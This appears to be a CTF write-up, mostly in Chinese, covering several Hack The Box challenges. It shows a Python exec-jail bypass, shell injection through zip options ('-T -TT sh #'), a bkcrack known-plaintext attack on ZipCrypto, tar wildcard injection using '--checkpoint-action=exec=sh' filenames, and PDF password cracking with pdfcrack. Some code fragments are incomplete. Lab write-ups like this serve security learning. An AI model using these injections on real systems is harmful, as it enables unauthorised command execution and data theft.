Locked Away


def open_chest():
with open('flag.txt', 'r') as f:

blacklist = [
'import', 'os', 'sys', 'breakpoint',
'flag', 'txt', 'read', 'eval', 'exec',
'dir', 'print', 'subprocess', '[', ']',
'echo', 'cat', '>', '<', '"', '\'', 'open'

while True:
command = input('The chest lies waiting... ')

if any(b in command for b in blacklist):
print('Invalid command!')

except Exception:
print('You have been locked away...')

exec 是Python中的一个内置函数,它允许你在运行时动态地执行Python表达式、语句或代码块


└─$ nc 45572

.____ __ .___ _____
| | ____ ____ | | __ ____ __| _/ / _ \__ _ _______ ___.__.
| | / _ \_/ ___\| |/ // __ \ / __ | / /_\ \ \/ \/ /\__ \< | |
| |__( <_> ) \___| <\ ___// /_/ | / | \ / / __ \\___ |
|_______ \____/ \___ >__|_ \\___ >____ | \____|__ /\/\_/ (____ / ____|
\/ \/ \/ \/ \/ \/ \/\/

The chest lies waiting... blacklist.clear()
The chest lies waiting... open_chest()



└─$ nc 37184

[*] Directory to work in: JZ41Tktly8IFNwi9PtSuA1OJNkn9Fk5k

Component List:

| |
| 1. Head 🤖 |
| 2. Torso 🦴 |
| 3. Hands 💪 |
| 4. Legs 🦵 |
| |

[*] Choose component: 1

[*] Sub-directory to work in: JZ41Tktly8IFNwi9PtSuA1OJNkn9Fk5k/Head


1. Create artifact
2. List directory (pwd; ls -la)
3. Compress artifact (zip <name>.zip <name> <options>)
4. Change directory (cd <dirname>)
5. Clean directory (rm -rf ./*)
6. Exit

[*] Choose action:


└─$ nc 37184

[*] Directory to work in: JZ41Tktly8IFNwi9PtSuA1OJNkn9Fk5k

Component List:

| |
| 1. Head 🤖 |
| 2. Torso 🦴 |
| 3. Hands 💪 |
| 4. Legs 🦵 |
| |
[*] Choose component: 1

[*] Sub-directory to work in: JZ41Tktly8IFNwi9PtSuA1OJNkn9Fk5k/Head


1. Create artifact
2. List directory (pwd; ls -la)
3. Compress artifact (zip <name>.zip <name> <options>)
4. Change directory (cd <dirname>)
5. Clean directory (rm -rf ./*)
6. Exit
[*] Choose action: 1
Insert name: mikannse
Insert content: mikannse
[+] Artifact [mikannse] was created successfuly!

1. Create artifact
2. List directory (pwd; ls -la)
3. Compress artifact (zip <name>.zip <name> <options>)
4. Change directory (cd <dirname>)
5. Clean directory (rm -rf ./*)
6. Exit

[*] Choose action: 2
total 12
drwxr-sr-x 2 ctf ctf 4096 Sep 6 04:00 .
drwxr-sr-x 6 ctf ctf 4096 Sep 6 03:58 ..
-rw-r--r-- 1 ctf ctf 8 Sep 6 04:00 mikannse

1. Create artifact
2. List directory (pwd; ls -la)
3. Compress artifact (zip <name>.zip <name> <options>)
4. Change directory (cd <dirname>)
5. Clean directory (rm -rf ./*)
6. Exit

[*] Choose action: 3

Insert <name>.zip: mikannse
Insert <name>: mikannse
Insert <options>: -T -TT 'sh #'
adding: mikannse (stored 0%)



const { Router } = require('express')
const child_process = require('child_process')
const fs = require('fs')
const crypto = require('crypto');
const path = require('path');
const os = require('os');

const { FLAG, PASSWORD } = require('./config/config')

const router = Router()

router.post('/ingredients', (req, res) => {
let data = `Secret: ${FLAG}`

if (req.body.ingredients) {
data += `\n${req.body.ingredients}`

const tempPath = os.tmpdir() + '/' + crypto.randomBytes(16).toString('hex')
fs.writeFileSync(tempPath + '/ingredients.txt', data)
child_process.execSync(`zip -P ${PASSWORD} ${tempPath}/ingredients.zip ${tempPath}/ingredients.txt`)
return res.sendFile(tempPath + '/ingredients.zip')

router.get('/*', (_, res) => res.sendFile(__dirname + '/static/index.html'))

module.exports = router

就是说我们可以输入一串字符,然后会被拼接到flag后面并且用zip指令指定一个密码压缩成压缩包让我们下载下来。密码是怎么来的可以在config.js中看到PASSWORD: crypto.randomUUID()


[Running] node "c:\Users\mikannse\Desktop\1.js"

爆破压缩包的密码显然不现实,于是鉴于压缩包内的文件内容一部分是我们输入的,由于已知压缩包内容是以Secret: HTB{ 开头。


使用bkcrack工具: https://github.com/kimci86/bkcrack


PS C:\Users\mikannse\Desktop\bkcrack-1.7.0-win64> .\bkcrack.exe -L .\ingredients.zip
bkcrack 1.7.0 - 2024-05-26
Archive: .\ingredients.zip
Index Encryption Compression CRC32 Uncompressed Packed size Name
----- ---------- ----------- -------- ------------ ------------ ----------------
0 ZipCrypto Deflate c4d7f400 48 59 tmp/72728dae00fcc05fc62ae89dc0842f66/ingredients.txt

-C指定压缩包,-c指定要获得的压缩包中的文件,-p指定明文文件,自己创建一个,内容是Secret: HTB{

PS C:\Users\mikannse\Desktop\bkcrack-1.7.0-win64> .\bkcrack.exe -C .\ingredients.zip -c tmp/72728dae00fcc05fc62ae89dc0842f66/ingredients.txt -p .\plaintext.txt
bkcrack 1.7.0 - 2024-05-26
[23:09:06] Z reduction using 4 bytes of known plaintext
100.0 % (4 / 4)
[23:09:06] Attack on 1303249 Z values at index 6
Keys: f52e5c12 fe26c8f1 dca2f504
95.8 % (1247977 / 1303249)
Found a solution. Stopping.
You may resume the attack with the option: --continue-attack 1247977
[23:18:18] Keys
f52e5c12 fe26c8f1 dca2f504


Micro Storage

└─$ nc 30366
| ___ ____ _____ _ __ _____ |
| | \/ (_) / ___| | / | | _ | |
| | . . |_ ___ _ __ ___ \ `--.| |_ ___ _ __ __ _ __ _ ___ __ __`| | | |/' | |
| | |\/| | |/ __| '__/ _ \ `--. \ __/ _ \| '__/ _` |/ _` |/ _ \ \ \ / / | | | /| | |
| | | | | | (__| | | (_) | /\__/ / || (_) | | | (_| | (_| | __/ \ V / _| |_\ |_/ / |
| \_| |_/_|\___|_| \___/ \____/ \__\___/|_| \__,_|\__, |\___| \_/ \___(_)___/ |
| B y H a c k T h e B o x L a b s __/ | |
| |___/ |
`-----------------------. .-------------------------'
| Welcome to your online temporary |
| Micro Storage |

\!/ WARNING \!/
Your storage only lasts during the ongoing session, once the session killed, all
your files will be gone. Use this service responsibly.

1 => Upload a new file (10 file(s) remaining)
2 => List your uploaded files (0 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option:


那么猜测使用的像是 tar -cf * 的命令,那么显然可以用检查点的方式来执行脚本命令了

1 => Upload a new file (10 file(s) remaining)             
2 => List your uploaded files (0 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option: 1
[*] Enter your file name: a.sh
[*] Start typing your file content: (send 'EOF' when done)
cat /flag.txtEOF
[+] Your file "a.sh" has been saved. (13 bytes written)
1 => Upload a new file (9 file(s) remaining)
2 => List your uploaded files (1 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option: 1
[*] Enter your file name: --checkpoint=1
[*] Start typing your file content: (send 'EOF' when done)
[+] Your file "--checkpoint=1" has been saved. (1 bytes written)
1 => Upload a new file (8 file(s) remaining)
2 => List your uploaded files (2 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option: 1
[*] Enter your file name: --checkpoint-action=exec=sh a.sh
[*] Start typing your file content: (send 'EOF' when done)
[+] Your file "--checkpoint-action=exec=sh a.sh" has been saved. (1 bytes written)
1 => Upload a new file (7 file(s) remaining)
2 => List your uploaded files (3 file(s) uploaded so far)
3 => Delete a file
4 => Print file content
5 => Compress and download all your files
0 => Quit (you will lose your files!)
>>> Choose an option: 5

The secret of a Queen



0ld is g0ld


└─$ pdfcrack -w /usr/share/wordlists/rockyou.txt -f "0ld is g0ld.pdf"
PDF version 1.6
Security Handler: Standard
V: 2
R: 3
P: -1060
Length: 128
Encrypted Metadata: True
FileID: 5c8f37d2a45eb64e9dbbf71ca3e86861
U: 9cba5cfb1c536f1384bba7458aae3f8100000000000000000000000000000000
O: 702cc7ced92b595274b7918dcb6dc74bedef6ef851b4b4b5b8c88732ba4dac0c
Average Speed: 64605.2 w/s. Current Word: 'sheena1234'
Average Speed: 64316.3 w/s. Current Word: 'yorrej'
Average Speed: 64684.4 w/s. Current Word: 'sexykelly4'
Average Speed: 64416.8 w/s. Current Word: 'nearykalyan'
Average Speed: 66907.1 w/s. Current Word: 'kobngangko'
found user-password: 'jumanji69'
